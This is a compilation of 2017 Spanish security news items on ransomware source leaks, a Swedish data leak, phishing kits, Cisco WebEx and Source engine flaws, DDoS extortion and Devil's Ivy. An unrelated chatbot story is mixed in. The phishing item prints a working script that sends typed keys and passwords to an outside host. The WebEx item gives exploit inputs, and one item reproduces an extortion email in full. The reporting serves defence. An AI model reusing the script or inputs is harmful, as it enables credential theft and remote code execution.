Informe de Cisco: prevén nuevos ataques de DeOS

Así surge del Reporte de Ciberseguridad de Mitad de año (MCR) de Cisco 2017. Además, se espera un crecimiento en la escala y el impacto de las amenazas. La compañía advierte que “industrias clave necesitan mejorar las medidas de seguridad al tiempo que convergen la tecnología de la información y la operativa”.

El Informe revela la rápida evolución de las amenazas y la creciente magnitud de los ataques, llevando a los investigadores a pronosticar actividades maliciosas potenciales de “destrucción de servicios” (DeOS) que podrían eliminar las copias de seguridad y las redes de seguridad de las organizaciones, que son necesarias para restaurar los sistemas y datos después de sufrir un ataque.

Los recientes ataques como WannaCry y Nyetya han mostrado la rápida propagación y el amplio impacto de los ataques de tipo ransomware, que en realidad pueden llegar a ser más destructivos. Esto presagia lo que Cisco ha llamado ataques de “Destrucción de Servicios”, que pueden ser inmensamente más perjudiciales que los tradicionales, dejando a las empresas sin ninguna opción a recuperarse.

“Con la llegada del Internet de las Cosas, las principales industrias están realizando más operaciones en línea, aumentando sus vulnerabilidades, la escala y el impacto potencial de los ataques”, advierte Cisco.

De acuerdo con Cisco el IoT sigue ofreciendo nuevas oportunidades para que los piratas informáticos exploten las debilidades de seguridad, jugando un papel central en la habilitación de estas campañas con un impacto cada vez mayor. “La actividad reciente de IoT Botnet sugiere que algunos criminales pueden estar sentando las bases para un ataque de gran alcance y alto impacto que podría perturbar la propia Internet”, sostiene.

En este sentido, medir la efectividad de las prácticas de seguridad de frente a esos ataques es crítico. Cisco registra progreso en el tiempo de detección (TTD), la ventana de tiempo entre un sistema comprometido y el tiempo de detección de un ataque.

Cisco asegura haber disminuido el TTD desde poco más de 39 horas en noviembre de 2015, hasta llevarla a alrededor de 3.5 horas en el período de noviembre de 2016 a mayo de 2017. Estas cifras se basan en la telemetría provenientes de los equipos de la marca desplegados a nivel mundial.

 

Qué es caliente y qué no lo es

Durante la primera mitad de 2017, los investigadores de seguridad de Cisco han observado la evolución del malware e identificaron cambios en la forma en que los piratas informáticos están adaptando sus técnicas de entrega, propagación y evasión.

Específicamente, la compañía se dio cuenta que estos delincuentes obligan cada vez más a la víctima a tomar medidas para activar una amenaza, como el hecho de hacer clic en un enlace o abrir un archivo; desarrollando malware sin programas instalados completamente en la memoria. Esto genera que sean más complicados de detectar o investigar a medida que se anulan cuando un dispositivo se reinicia, y también genera obstáculos y desconfianza en la infraestructura anónima y descentralizada, como un servicio proxy Tor, para ocultar las actividades de mando y control.

Cisco ha notado una importante disminución en los kits de explosión, pero otros ataques tradicionales están resurgiendo:

El volumen de spam aumenta significativamente, ya que muchos piratas informáticos recurren a métodos comprobados en el pasado, como el correo electrónico, para distribuir malware y generar ingresos. Los investigadores de las amenazas de Cisco anticipan que el volumen del spam con los accesorios maliciosos continuará aumentando, mientras que el panorama del kit de la explotación continúa en flujo.

El spyware y el adware, que a menudo son desechados por los profesionales de seguridad por considerarlos más molestias que potenciales daños, son formas de malware que persisten y traen riesgos a la empresa. La investigación de Cisco siguió a 300 compañías durante un período de cuatro meses y encontró que tres familias predominantes del spyware infectaron el 20% de la muestra.

La evolución de ransomware, como el crecimiento de ransomware-como-servicio, facilitan a cualquier criminal llevar a cabo estos ataques, independientemente de sus habilidades.

Si bien esta amenaza ha estado ocupando los titulares durante meses y supuestamente aportó más de mil millones de dólares en 2016, desde Cisco advierten que esto puede estar distrayendo a algunas organizaciones que se enfrentan a una amenaza aún mayor. Por ejemplo, el compromiso comercial de correo electrónico (BEC), un ataque de ingeniería social en el que un correo electrónico diseñado para engañar a las organizaciones a transferir dinero al atacante, se está convirtiendo en un vector de amenazas altamente lucrativo. Entre octubre de 2013 y diciembre de 2016, US$ 5.3 mil millones fueron robados a través de BEC de acuerdo a The Internet Crime Complaint Center.

Industrias únicas que enfrentan desafíos comunes

A medida que la tecnología de la información y la tecnología operativa convergen en la Internet de las Cosas, las organizaciones están luchando para mantener la privacidad. Como parte del Estudio de Benchmark de Capacidades de Seguridad, Cisco consultó alrededor de 3,000 líderes de seguridad en 13 países y encontró que en todas las industrias, los equipos de seguridad están cada vez más abrumados por el volumen de ataques que combaten, lo que hace que muchos se vuelvan más reactivos en sus esfuerzos de protección.

Entre otros hallazgos, el informe advierte que no más de dos tercios de las organizaciones están investigando las alertas de seguridad, y en ciertas industrias, como la salud y el transporte, este número está más cerca del 50 por ciento. Incluso en las industrias más sensibles, como las finanzas y la atención sanitaria, las empresas están debilitando menos del 50 por ciento de los ataques que saben legítimos.

En la mayoría de las industrias las brechas impulsaron al menos modestas mejoras de seguridad en al menos el 90 por ciento de las organizaciones, aunque algunas industrias (como el transporte) son menos sensibles, cayendo por encima del 80 por ciento

En cuanto al sector público, de las amenazas investigadas, el 32 por ciento son identificadas como legítimas, pero sólo el 47 por ciento de esas amenazas legítimas son finalmente remediadas.

En Venta al por menor, 32 porciento dijo que había perdido ingresos debido a los ataques en el último año, con un promedio de pérdida de clientes u oportunidades de negocio que giran alrededor del 25 por ciento

En cuanto a Manufactura, 40 por ciento de los profesionales de seguridad de esta industria dijeron que no tienen una estrategia de seguridad formal, ni siguen las prácticas estandarizadas de políticas de seguridad de la información como ISO 27001 o NIST 800-53.

En Servicios, los profesionales de seguridad dijeron que los ataques dirigidos (42 por ciento) y las amenazas persistentes avanzadas, o APT (40 por ciento) eran los riesgos de seguridad más críticos para sus organizaciones.

En el Sector salud, el 37 por ciento de las organizaciones de Salud dijo que los ataques dirigidos son riesgos de alta seguridad para sus organizaciones

Consejos de Cisco
Para combatir los ataques cada vez más sofisticados de hoy en día, las organizaciones deben tomar una postura proactiva en sus esfuerzos de protección. Cisco Security recomienda:
• Mantener actualizada la infraestructura y las aplicaciones, para que los atacantes no puedan explotar las debilidades públicamente conocidas

• Combatir la complejidad a través de una defensa integrada. Limitar las inversiones aisladas.

• Involucrar a los principales líderes ejecutivos para asegurar una comprensión completa de los riesgos, las recompensas y las restricciones presupuestarias

• Examinar el entrenamiento de seguridad de los empleados con capacitación basada en funciones frente a una capacitación igual para todos.

• Equilibrar la defensa con una respuesta activa. No “ponga y olvide” los controles o procesos de seguridad.

“La complejidad continúa obstaculizando los esfuerzos de seguridad de muchas organizaciones. Es obvio que los años de invertir en productos puntuales que no pueden integrarse están creando enormes oportunidades para los atacantes, que pueden identificar fácilmente vulnerabilidades pasadas por alto o vacíos en los esfuerzos de seguridad. Para reducir eficazmente el tiempo de detección y limitar el impacto de un ataque, la industria debe pasar a un enfoque más integrado y arquitectónico que aumente la visibilidad y la capacidad de gestión, lo que permite a los equipos de seguridad cerrar las brechas “, dijo David Ulevitch, vicepresidente senior y gerente general del Grupo de Negocio de Seguridad, Cisco

Más información
Cisco 2017 Midyear Cybersecurity Report

Publicado el código fuente para Android de SLocker, el ransomware de las mil caras Recibidos x CALENDARIO x noticias@hispasec.com x Foros x

SLocker es un ransomware para Android que cifra los archivos y bloquea
la pantalla. Se caracteriza por haberse hecho pasar por distintas
fuerzas de seguridad de los estados, e incluso por el mismísimo
WannaCry, para cobrar el rescate.

Una versión de SLocker que se disfraza de WannaCry:

 

Como si de una herramienta open source cualquiera se tratase, hace unos
días se publicó en GitHub el código fuente de SLocker. El responsable,
un usuario bajo el pseudónimo fs0c1ety, Tal y como avisa en la
descripción, no es el código fuente original, sino el obtenido tras
decompilar una muestra con técnicas de ingeniería inversa. Parece ser
que este usuario le está cogiendo el gustillo a eso de decompilar
malware para Android y publicar el código fuente, como muestra otro
nuevo repositorio en su misma cuenta, esta vez decompilando GhostCtrl,
otro peligroso malware para Android que, según la versión, recopila
datos personales del terminal, secuestra funcionalidades del teléfono, o
todo a la vez.

En vez de centrarnos en el ransomware en sí, sobre el que ya hay
información en la red de sobra, vamos a centrarnos en la publicación de
su código fuente. El que publica especifica que el código fuente debe
ser usado únicamente con propósitos de investigación en seguridad
informática. Pero las palabras son sólo palabras, y el patrón es
conocido de sobra: se publica el código fuente de un malware y en los
días sucesivos florece una gran variedad de versiones de este,
compiladas usando como base el código fuente publicado. La verdad, no
podemos saber a ciencia cierta la intención de este usuario de GitHub
que pide ayuda en una issue (ticket) para compilar el malware.

Comentario en el repositorio:

El código fuente público de malware atrae principalmente a delincuentes
con perfil bajo, y no se espera un gran impacto a pesar de la
liberación. Los delincuentes más experimentados suelen preferir
programar ellos mismos el malware o comprarlo hecho a terceros con
soporte y garantía de no ser demasiado público (y por tanto demasiado
investigado y detectado). Al no ser atacantes muy sofisticados, los
medios de propagación del malware tampoco lo serán, y seguramente se
limitarán a intentar colar troyanos usando ingeniería social (haciendo
pasar el malware por una herramienta para rootear el móvil o hacer
trampas en un videojuego).

¿Cómo evitar ser infectado? El principal punto débil sigue siendo el
usuario. Una vez tienes todo software del terminal actualizado, el resto
es sentido común. No instales aplicaciones sospechosas (ni siquiera si
vienen de Google Play), ya sabes que el malware se disfraza. ¿De verdad
necesitas esa aplicación para hacer trampas en un videojuego? Te puede
costar un mal rato…

Más información:

SLocker decompiled code leaked online for free, a gift for crooks and hackers

SLocker decompiled code leaked online for free, a gift for crooks and hackers

Android Smartphones Targeted by WannaCry Lookalike
https://www.bleepingcomputer.com/news/security/android-smartphones-targeted-by-wannacry-lookalike/

Cómo saber si estamos infectados por el troyano GhostCtrl y cómo protegernos de él
https://www.softzone.es/2017/07/17/ghostctrl-nuevo-troyano-android/

Ransomware Recap: Ransomware as a Service Surge, SLocker Resurfaces
https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ransomware-recap-ransomware-as-a-service-surge-slocker-resurfaces

Comenta esta noticia:
http://unaaldia.hispasec.com/2017/07/publicado-el-codigo-fuente-para-android.html#comment-form

Millones de datos de personal militar, testigos protegidos y material militar filtrados por el gobierno sueco.

El gobierno sueco ha expuesto datos sensibles de millones de ciudadanos.
Sin embargo, las consecuencias no han ido más lejos de, al cambio,
8,500$

¿Cómo comenzó todo?

En 2015, la Agencia de Transportes sueca (STA, de ahora en adelante)
llegó a un acuerdo de mantenimiento de equipos informáticos para
gestionar sus bases de datos y redes con IBM Suecia.

La STA subió su base de datos completa a servidores en la nube de IBM,
la cual contenía detalles sobre todos los vehículos del país incluyendo
aquellos correspondientes a la policía, registros militares e incluso
testigos protegidos.

Y fue esa misma base de datos es la que la agencia de transportes envió
a vendedores suscritos, y además en texto plano, sin cifrar. Al
descubrirse el error, la agencia de transportes simplemente envió un
nuevo e-mail, pidiendo a las personas suscritas que eliminarán la base
de datos completa que ellos mismos habían mandado anteriormente.

Pero el escándalo no acaba aquí. La subcontratación llevada a cabo con
IBM permitía el acceso desde fuera de Suecia a los sistemas de la STA
sin pasar por medidas de seguridad necesarias. Los administradores de
IBM en la República Checa tenían acceso a todos los datos y registros,
mientras que otra empresa en Serbia administraba las comunicaciones.

Según Rick Falkvinge, fundador de la VPN Private Internet Access, quien
hizo público el escándalo, los datos incluidos en esta filtración
incluyen:

* Capacidad de todas las carreteras y puentes.
* Nombres, fotos y direcciones de pilotos de combate de las fuerzas
aéreas..
* Nombres, fotos y direcciones de todos los incluidos en el registro
policial, los cuales se creían datos clasificados.
* Nombres, fotos y direcciones de todos los operadores de las unidades
de élite del país, el equivalente a los Navy SEAL.
* Nombres, fotos, y direcciones de todos los testigos protegidos.
* Tipo, módelo, tamaño, e incluso defectos en todos los vehículos
militares, incluyendo sus operadores.

A pesar de que la brecha se produjo en 2015, no fue descubierta hasta
2016 y acabó con la renuncia de Maria Agren, directora general de la
STA, en enero de 2017, además de una multa de 8,500$.

Lo más preocupante: La base de datos no será segura hasta este otoño,
según palabras del nuevo director general Jonas Bjelfvenstam.

Más información:
https://www.bleepingcomputer.com/news/security/biggest-data-leak-in-swedens-history-punished-with-half-a-months-paycheck/

Ejecución remota de código en el SDK Source de

El investigador privado Justin Taft (@JustTaft), perteneciente a la
firma One Up Security, ha demostrado recientemente que el motor de
juegos Source de la empresa Valve se veía afectado por una ejecución
remota de código que ha sido finalmente solucionada.

Source es el motor oficial de videojuegos utilizado por Valve para sus
diferentes títulos, como Counter Strike:GO, Teamfortress 2, Half-Life 2:
Deathmatch, etc… y también usado por terceros de manera gratuita, para
el desarrollo de mods propios.

La vulnerabilidad se debe a una falta de comprobación de límites en la
función ‘nexttoken’, al no controlar correctamente que el buffer ‘token’
pueda desbordarse. Este desbordamiento (buffer overflow) podría ser
aprovechado como se puede ver en el video publicado, para ejecutar
código arbitrario, ya que la función afectada es llamada por un una
clase (CRagdollCollisionRulesParse) encargado de cargar datos externos
de modelos Ragdoll cuando se realizan determinados eventos, por ejemplo
cuando un jugador es eliminado.

Video demostrativo de la vulnerabilidad:
http://unaaldia.hispasec.com/2017/07/ejecucion-remota-de-codigo-en-el-sdk.html

Desde Valve se han publicado las actualizaciones oportunas tanto del SDK
como del cliente Steam, aunque también existes contramedidas y/o parches
disponibles para los mods ya publicados, facilitadas por el
investigador:

Parche disponible:
https://oneupsecuritycdn-8266.kxcdn.com/static/blog/hl2-rce/nexttoken.patch

Más información:

Remote Code Execution In Source Games
https://oneupsecurity.com/research/remote-code-execution-in-source-games

Update Released for Counter-Strike: Source, Day of Defeat: Source, Half-Life Deathmatch: Source, Half-Life 2: Deathmatch, and the Source SDK 2013 Base
http://store.steampowered.com/news/30120/

La facilidad de los atacantes a día de hoy: Ataques de phishing a golpe de click

No es novedad que a diario se venden miles de herramientas de hacking
usadas con fines maliciosos. Estas herramientas, por regla general,
requieren de un mínimo de conocimiento por parte del ciberdelincuente,
pero a día de hoy esto está cambiando, y es que ya existen plataformas
para realizar múltiples tipos de ataques sin saber siquiera el nombre
del mismo.

Hoy vamos a exponer un caso de uso de unas de las múltiples plataformas
que se pueden encontrar por Internet. El nombre de la web no va a ser
publicado para no fomentar el uso de la misma entre los lectores.

Llama la atención al entrar en la web, la interfaz amigable y por qué no
decirlo, infantil que tiene. Parece una página sin ninguna malicia, sin
embargo contiene numerosos tipos de ataques los cuáles están gravemente
penados por la ley en nuestro país.

Al registrarte, lo primero que aparece es un mensaje de bienvenida el
cuál nos indica que tienen un pequeño tutorial para nosotros.

Imagen de bienvenida a la plataforma:


Al avanzar, nos encontramos un “about” de la web. Nos explica que la
página nos da acceso a una serie de “complejas herramientas” y que en
pocos pasos vamos a aprender a usar una de ellas de manera gratuita.

Realmente las herramientas a las que te dan acceso son muy simples y
apenas requieren de conocimientos para hacer el ataque de forma manual.

Por supuesto, no era de dudar que cuenta con una versión PREMIUM para
sacar más provecho a la herramienta.

Avanzamos a través de los paneles y podemos comprobar cómo el primer
ataque que nos enseña es la realización de un phishing a Facebook.

Imagen de cómo hackear una cuenta de Facebook!:

Aunque nuestros lectores están habituados a escuchar la palabra
phishing, vamos a recordar que es un ataque de phishing aquel que
mediante ingeniería social, se centra en adquirir cierta información
confidencial de la víctima. Para ello, el cibercriminal se hace pasar
por una persona o entidad (en este caso por la red social Facebook) para
solicitarle esa información.

Un par de clicks y nos genera un enlace con una burda versión de la
página de Facebook para que se la enviemos a nuestra víctima.

Al ver la web cualquier persona con unos conocimientos mínimos no caería
ni por el enlace, el cuál es muy llamativo, ni por la imagen que da, la
cuál es bastante pobre. Pero, sin embargo, alguien sin conocimientos sí
que podría pensar que es una página legítima.

Enlaces generados para el ataque de phishing:

Página de Facebook generada para el ataque:

Pero algo todavía mucho más llamativo, es que al escribir la contraseña
ni siquiera oculte los caracteres como haría un campo de tipo
contraseña.

Detalles de la contraseña en texto claro:

Si comprobamos el código fuente de la web generada para el ataque, vemos
que apenas son 127 líneas. Dentro de ellas, podemos encontrar un
hotlinking a los iconos de Facebook en una página externa a Facebook:

También podemos ver el script que nos redirecciona a Facebook una vez
“iniciamos sesión en la página”:

<script type=”text/javascript”>
var BigData = {
id: ‘3015’,
token: ‘i0n8QDoNAk8VHo8Pg3MKNcwtXE0LWT2zUAYBdL9qAOlTkZpB6s’,
name: ‘Facebook’,
site_id: ‘9’,
redirect: ‘http://www.facebook.com/login‘,
hsData: “9|3015|i0n8QDoNAk8VHo8Pg3MKNcwtXE0LWT2zUAYBdL9qAOlTkZpB6s|1500371221″,
};

var socket = io(‘https://pod-1.logshit.com);

socket.on(‘ping’, function (data) {
socket.emit(‘hello’, BigData );
});

socket.on(‘redirect’, function(data){
window.location = BigData.redirect;
});

$(document).ready(function(){
$(‘body’).click(function(e){
this.BigData = BigData;
socket.emit(‘clicked’, this.BigData);
});

$(‘body’).on(‘keyup’, function(e){
this.BigData = BigData;
this.BigData.key = e.key;
socket.emit(‘keyup’, this.BigData);
});
});

$(“#login_form”).keypress(function(e) {
if (e.which == 13) {
$(“#submit”).click();
}
});

$(“#submit”).click(function(e) {
e.preventDefault();
if ($(“#username”).val() == “”) {
var err = “1”;
alert(‘Username cannot be left empty’);
}
if ($(“#password”).val() == “”) {
var err = “1”;
alert(‘Password cannot be left empty’);
}
if (err != “1”) {
socket.emit(‘log’, {
username : $(“#username”).val(),
password : $(“#password”).val(),
hsData: BigData.hsData,
BigData: BigData,
});
}
});

</script>

Es un ataque de phishing muy básico pero que cualquier persona podría
realizar sin ningún tipo de complicación ni conocimientos.

Al terminar de preparar el ataque, te recomiendan otras dos guías. La
primera de ellas es para realizar un phishing a un correo electrónico y
la segunda para ver los logs de las personas que han picado en el
ataque.

Guías que ofrece el servicio:

Si nos dirigimos al apartado de nuestra web creada, veremos cómo
aparecen las estadísticas de las visitas recibidas:

Estadísticas de las visitas recibidas:

Indagando un poco más en la página, podemos ver cómo ofrecen este
servicio para realizar este tipo de ataque a 26 webs diferentes.

Servicios contra los que se puede crear un phishing a golpe de click:

También cuentan con un market en el que puedes comprar o vender
servicios. Los métodos de pago aceptados son muy variados, desde Bitcoin
hasta Paypal pasando por Western Union y MoneyGram.

Servicios de pago aceptados:

Si además pagamos por la cuenta PREMIUM antes mencionada, cabe destacar
que tenemos acceso a más servicios, los cuáles parecen ser igual de
mediocres que el anterior pero que con una víctima inexperta y un poco
de ingeniería social, podrían ser realmente dañinos.

Servicios premium ofrecidos por la plataforma:

Con esta una-al-día queríamos demostrar a nuestros lectores que hoy en
día realizar acciones maliciosas en Internet no es complicado ni
requiere de conocimientos Informáticos, pero en España puede llegar a
incurrir en penas de 6 meses a 3 años de prisión.

Para finalizar, recalcar que esta es una de las muchas plataformas de
creación de phishing gratuitas que hay por Internet. Algunas más
simples, otras más complejas, pero todas pueden ser usadas para realizar
acciones maliciosas altamente penadas.

Inteligencia artificial para mejorar la experiencia del cliente

El retail brasileño Via Varejo ha creado un Chatbot con IBM Watson, que permitirá a los consumidores acceder a información sobre sus compras, cambios y devoluciones.

Via Varejo e IBM anunciaron que la empresa brasileña usará inteligencia artificial para mejorar la experiencia de sus clientes de Casas Bahia y Pontofrio, los dos retailers que son propiedad de Via Varejo. La compañía está lanzando un chatbot: canal de comunicación basado en Watson, la plataforma cognitiva de IBM, que permitirá a los consumidores acceder a información sobre sus compras, cambios y devoluciones.

La herramienta también ayudará a los clientes a elegir los mejores productos, basándose en sus preferencias y necesidades.

El servicio está disponible, incluso, para ayudar a los vendedores para que atiendan mayor y más rápido a los clientes en tiendas físicas. “Esta tecnología nos ayudará a entender aún mejor los deseos de nuestros clientes, además de ofrecerles un servicio exclusivo, rápido y multitarea, ya que usaremos nuestra data sincronizada entre las tiendas físicas y online”, indicó Flavio Dias, director e-commerce de Via Varejo.

Con esta opción, la compañía optimiza el tiempo de respuesta online y offline, hace actualizaciones de contacto con los clientes y ayuda al equipo de ventas a ofrecer información más específica sobre productos.

Los chatbots creados usando tecnología Watson, permiten entender el lenguaje natural de los humanos. Procesan información de una forma inteligente y responden con alto nivel de exactitud y confiabilidad. La gran diferencia en esta plataforma de inteligencia cognitiva es que IBM Watson puede leer la intención detrás de las preguntas, extrayendo el contexto de cada interacción y ofreciendo una respuesta igual que una conversación humana.

Especialistas en servicio al cliente hicieron parte del entrenamiento de la herramienta, la cual por sí misma está en constante aprendizaje a través de la interacción con los usuarios. Todo lo que Watson aprende es supervisado por profesionales y ellos aceptan los mejoramientos, en caso de ser necesario. “El proyecto con Via Varejo nos muestra cómo la inteligencia cognitiva de IBM puede mejorar la eficiencia operacional de las compañías, ayudando a los equipos de ventas a ofrecer un mejor servicio, dando al consumidor final una satisfactoria y nueva experiencia”, dijo Júlia Amado, ejecutiva de ventas de IBM.

Watson es una herramienta versátil que está ayudando a diferentes segmentos de mercado en Brasil y alrededor del mundo. Se espera que para 2018, 1.000 millones de personas hayan tenido algún contacto con Watson.

Graves vulnerabilidades en la extensión de navegadores de Cisco WebEx

Cisco WebEx es un servicio de videoconferencias que cuenta con varias aplicaciones para poder interaccionar con él. Desde la aplicación de escritorio, aplicaciones móviles, web y extensiones de navegador.

Son precisamente estas últimas donde se encuentran las vulnerabilidades reportadas por Cris Neckar de Divergent Security y Tavis Ormandy de Google. Lo errores pueden llegar a producir una ejecución remota de código.

– La primera de ellas se encuentra al leer el JSON. WebEx utiliza dentro de la librería “atgpcext” un parser de JSON propio para procesar los mensajes desde el cliente.

El siguiente código muestra cómo se podría crear 2 atributos con el mismo nombre.

 var c = e.GpcExtName;  
 if (c && (c = c.trim(),  
 "atgpcext" != c.toLowerCase() && "atgpcext" != atob(c).toLowerCase().trim()))  
   return !1;  
 var d = e.GpcUnpackName;  
 if (d && (d = d.trim(),  
 "atgpcdec" != d.toLowerCase() && "atgpcdec" != atob(d).toLowerCase().trim()))  
   return !1;  
 var f = e.GpcInitCall;  
 if (f && !a.verifyScriptCall(atob(f.trim())))  

Para ello bastaría con utilizar un diccionario con el siguiente contenido:

 object={ "foo": 1, "foo\0": 2 }  

Lo cual provocaría que se crearan 2 atributos con el nombre “foo”, uno con el valor 1, que sería visible por el navegador Chrome y otro con el valor 2, que sería visible por la librería “atgpcext”.

– La segunda vulnerabilidad se encuentra en una expresión regular incompleta en “GpcScript“. Para la interacción de WebEx con los componentes nativos del sistema se utiliza JavaScript. El siguiente código se corresponde con la función que verifica que la entrada sea correcta:

 a.verifyScriptCall = function(a) {  
   var b = /^(WebEx_|A[sT][ADEPSN]|conDll|RA[AM])|^(Ex|In)it|^(FinishC|Is[NS]|JoinM|[NM][BCS][JRUC]|Set|Name|Noti|Trans|Update)|^(td|SCSP)$/;  
   if (10240 < a.length)  
     return !1;  
   a = a.split(";");  
   for (var c = 0; c < a.length; c++) {  
     var d = a[c].trim()  
      , f = ""  
      , g = d.indexOf("=");  
     0 <= g && (d = d.substring(g + 1).trim());  
     g = d.indexOf("(");  
     0 <= g && (f = d.substring(g + 1),  
     d = d.substring(0, g).trim());  
     g = f.split(",");  
     if (1024 < f.length || 20 < g.length || 0 < d.length && !d.match(b))  
       return !1  
   }  
   return !0  
 }  

Si un atacante malicioso introdujese la entrada _wsystem(Calc)=WebEx_Exploit;, el sistema la aceptaría y funcionaría:

Esto permitiría a un atacante remoto llamar y ejecutar cualquier función exportada de cualquier librería del sistema, lo cual se traduce en una ejecución de código remoto arbitrario.

– La tercera vulnerabilidad residen en la llamada de funciones que se encuentra en lista blanca, con parámetros bajo el control del usuario.

Cualquier función que se encuentre en la lista blanca de funciones a exportar por WebEx acepta parámetros. Por ejemplo “atmccli!WebEx_AutoLaunch“, la cual está permitida, pero el parámetro o parámetros son objetos controlados por el usuario. La rutina hará una llamada virtual que puede resultar en una ejecución de código arbitrario. Con el siguiente JSON se podría ejecutar código arbitrario de la dirección ObjectAddress:

 {  
   ObjectAddress: "1094795585",  
   GpcInitCall: "WebEx_AutoLaunch(ObjectAddress, ObjectAddress, ObjectAddress);"  
 }  

– La última vulnerabilidad se reside en que cualquier atacante puede actualizar a una versión anterior del plugin configurando los parámetros “GpcExtVersion” y “GpcUrlRoot“. En este caso se comprueba la firma del binario, pero el atacante podría volver a una versión en la que el plugin sea vulnerable a otros ataques.

Los productos vulnerables son:
– Plugin para Google Chrome, versiones anteriores a 1.0.12
– Extensión para Mozilla Firefox, versiones anteriores a 1.0.12

Cisco recomienda actualizar los plugin de navegador y las aplicaciones de escritorio.

Más información:

Cisco Security Advisory – Cisco WebEx Browser Extension Remote Code Execution Vulnerability
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170717-webex

Cisco: WebEx Various GPC Sanitization bypasses permit Arbitrary Remote Command Execution
https://bugs.chromium.org/p/project-zero/issues/detail?id=1324

Los ciberdelincuentes encuentran en los ataques DDoS nuevas formas de extorsión

Durante el mes de julio se está detectando una nueva campaña de email que tienen como objetivo la extorsión a empresas mediante la amenaza de que sus equipos sufrirán un ataque en los próximos días, a no ser que reciban una cantidad de dinero en Bitcoin en la cuenta que indican los atacantes.


Los primeros ataques detectados compartían una cuenta de Bitcoin en todos los emails que enviaban, por lo que hacía pensar que, aún haciendo el pago, los atacantes no podían trazar la empresa que había procedido con el, y por consiguiente no se llevaría a cabo ningún ataque. De este ataque ya se hizo eco INCIBE a través de su web.


Pero estos nuevos intentos de extorsión que hemos detectado vienen acompañados de un ataque de DDoS previo al email y fijan una hora límite para recibir el pago, en caso contrario, procederán a llevar a cabo el ataque.


Adjuntamos correo tipo.

 

 De: Kadyrovtsy <Kadyrovite@protonmail.com>  
 Asunto: Ataque DDoS  
 REENVIE ESTE CORREO A QUIEN SEA IMPORTANTE EN SU EMPRESA Y TENGA PODER DE DECISION!   
   
 Somos Kadyrovtsy  
 http://lmgtfy.com/?q=Kadyrovtsy+andorra+telecom  
   
 En este mismo instante estamos iniciando un ataque de denegación de servicio en una de sus direcciones IP(XXX.XXX.XXX.XXX) Este ataque durara 10 minutos y es para que vea que somos serios.  
   
 Todos sus servidores van a ser atacados empezando este viernes {fecha}. GMT !!! Lanzaremos un nuevo ataque de denegación de servicio con una potencia de 300 Gbps, dejandole su sitio web totalmente inaccesible.  
   
 Puede detener este ataque pagando 0.5 bitcoin en la siguiente dirección bitcoin: {btc}  
   
 Si no sabe como comprar bitcoins busque en Google o adquiéralos en la empresa española Bit2me. El pago ha de recibirse antes de la fecha arriba indicada o el ataque comenzará.  
   
 Bitcoin es anónimo, nadie se enterara que su empresa ha pagado.  

Aún no sabemos si los atacantes cumplen con su amenaza en caso de no haber efectuado el pago. No obstante, el hecho de que se estén utilizando distintas cuentas de Bitcoins y de llevar a cabo un ataque con anterioridad nos induce a pensar que podrían perpetrar dicho ataque.

Quedamos a la espera de conocer más detalles y os animamos a compartir información que tengáis sobre esta forma de extorsión.

Devil’s Ivy: Una vulnerabilidad que afecta a millones de dispositivos IoT

Sale a la luz una nueva vulnerabilidad (denominada Devil’s Ivy) que infecta a millones de dispositivos. Este fallo permite ejecutar código remoto en gran parte de los dispositivos IoT: cámaras, lectores de tarjeta, etc.

Los encargados de este descubrimiento son los investigadores de seguridad de la empresa Senrio. Según afirman estos trabajadores, encontraron el fallo analizando el firmware de una cámara Axis M3004.

La vulnerabilidad consiste en un buffer overflow, que los trabajadores de Senrio consiguieron explotar para ejecutar código remoto en la cámara arriba mencionada, tal y como podemos apreciar en el siguiente vídeo.

Demostración de Devil’s Ivy en Axis M3004 por Senrio Labs:

Devil’s Ivy Exploit in Axis Security Camera from Senrio Labs on Vimeo.

Después de contactar con los distribuidores de estas cámaras (Axis Communications), la empresa les confirmó que la vulnerabilidad afectaba a unos 249 modelos diferentes de cámaras fabricadas por ellos.

La vulnerabilidad, con CVE-2017-9765 se encuentra en la librería de código abierto gSOAP (Simple Object Access Protocol).

gSOAP es un conjunto de herramientas de servicio web ampliamente usado y desarrollado por Genivia. Muchos programadores lo utilizan como parte de su software para permitir a los dispositivos comunicarse con Internet. Según Genivia, la librería ha sido descargada de su página web más de un millón de veces.

Más información:
Devil’s Ivy: The Technical Details
http://blog.senr.io/devilsivy.html

Descarga del último firmware de Axis
https://www.axis.com/global/es/support/firmware

Actualización de gSOAP
https://www.genivia.com/downloads.html